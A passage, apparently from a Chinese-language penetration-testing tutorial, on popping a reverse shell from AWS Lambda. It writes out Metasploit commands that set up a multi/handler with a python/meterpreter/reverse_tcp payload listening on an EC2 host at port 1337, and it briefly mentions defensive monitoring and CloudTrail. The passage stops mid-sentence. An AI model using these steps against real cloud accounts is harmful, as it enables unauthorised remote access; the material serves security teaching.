利用Lambda弹出反向shell及评估AWS API网关
1. 利用Lambda弹出反向shell
在Kali实例上,可能需要安装AWS CLI,可运行以下命令进行安装:
$ apt-get install awscli -y
在Lambda中获取shell既有趣又可能对毫无防备的企业造成危险。应对此问题的一个好方法是在网络中部署监控解决方案,例如具有出口规则(用于检测流出网络的畸形流量)和入口规则(用于查看流入的数据包)的网络预防和检测系统。对于AWS而言,CloudTrail是检测AWS环境内外流量的优秀资源。
下面来看看如何结合Metasploit和Lambda,利用Metasploit中的处理程序捕获会话(会话是在Metasploit中建立的连接)。具体步骤如下:
1. 启动Metasploit并输入以下命令设置处理程序:
$ use exploit/multi/handler
$ set payload python/meterpreter/reverse_tcp
$ set lhost <<EC2 instance DNS>>
$ set lport 1337
$ run
运行处理程序后,它将进入监听模式,等待传入连接。这与netcat的工作方式类似,但这里使用的是Meterpreter作为解释shell,而非默认的Bash shell。Meterpreter shell比netcat连接更强大,因为